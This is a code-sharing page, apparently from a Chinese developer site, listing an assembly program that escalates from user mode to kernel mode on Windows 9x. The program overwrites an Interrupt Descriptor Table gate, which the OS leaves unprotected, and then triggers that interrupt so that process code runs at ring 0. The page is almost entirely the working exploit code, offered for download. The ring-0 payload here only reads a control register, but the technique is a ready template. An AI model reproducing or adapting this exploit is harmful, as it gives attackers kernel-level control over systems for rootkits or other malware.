stnring0.asm

来自「从RING3进入RING0的方法,不需要驱动」· 汇编 代码 · 共 87 行

ASM
87
字号 
; This program switches ring from ring 3 to ring 0   
; It utillizes the fact that the page where the IDT is store is not protected in
; win 9x.
; it fetches the gate of an exception and then saves it.
; then it makes the exception points down to code within the process context
; then it causes the exception which succesfully transfers to a ring 0 selector
; it iret's the interupt and restores the original gate so other programs can 
; use it safely.

.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL			; with STDCALL we must reverse the sequence of pushes 
					; before a APIn call. 

UNICODE = 0				; Needed for w32.inc
INCLUDE W32.inc				; Windows definitions, messages, errors, structures,
					; API functions declarations. Some additions of mine.
					; Thanks to Barry Kauler and Sven Schreiber. 


lp EQU  OFFSET
extrn	SetUnhandledExceptionFilter : PROC

.DATA
skod db 0
lpOldGate  dd 0 
IDT	db 6 dup (0)
;---- Error Messages
szExceptionCaused db "Exception Caused - could not switch to ring 0",0
szError		  db "Error",0

ExceptionUsed	EQU 5

.CODE
start:
	
	call   SetUnhandledExceptionFilter, lp ExceptCallBack	; Catch exceptions 
								; (security if ring transform
								; doesn't work)
	sidt	fword ptr IDT			; fetch IDT register

	mov 	ebx, dword ptr [IDT+2]		; ebx -> IDT
	add	ebx, 8*ExceptionUsed		; Ebx -> IDT entry of ExceptionUsed


	cli					; Clear interupts

	mov	dx, word ptr [ebx+6]		; Save the current gate highword
	shl	edx, 16d
	mov	dx, word ptr [ebx]		; lowword
	mov	[lpOldGate], edx

	mov	eax, offset Ring0Code		; "install hook" - that is newgate
	mov	word ptr [ebx], ax		; lowword
	shr	eax, 16d
	mov	word ptr [ebx+6], ax		; highword

	int 	ExceptionUsed			; cause exception

	mov	ebx, dword ptr [IDT+2]		; restore gate
	add	ebx, 8*ExceptionUsed
	mov	edx, [lpOldGate]
	mov	word ptr [ebx], dx
	shr	edx, 16d
	mov	word ptr [ebx+6], dx
	

	CALL	ExitProcess, -1			; exit


Ring0Code PROC
	mov	eax, cr0		; Ring0 code here.. 

	iretd
Ring0Code ENDP

ExceptCallBack PROC
	call    MessageBoxA, 0, lp szError, lp szExceptionCaused, 0
	call	ExitProcess, -1
	ret
ExceptCallBack ENDP
	

ends
end start

stnring0.asm - 源码说明

本页面展示了「从RING3进入RING0的方法,不需要驱动」中的 stnring0.asm 源码文件,采用 汇编 编程语言编写,共 87 行代码。您可以在线阅读完整代码内容,也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫开发者社区收录了大量与Ring3相关的技术资源,包括源代码、技术文档、电路图等,是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?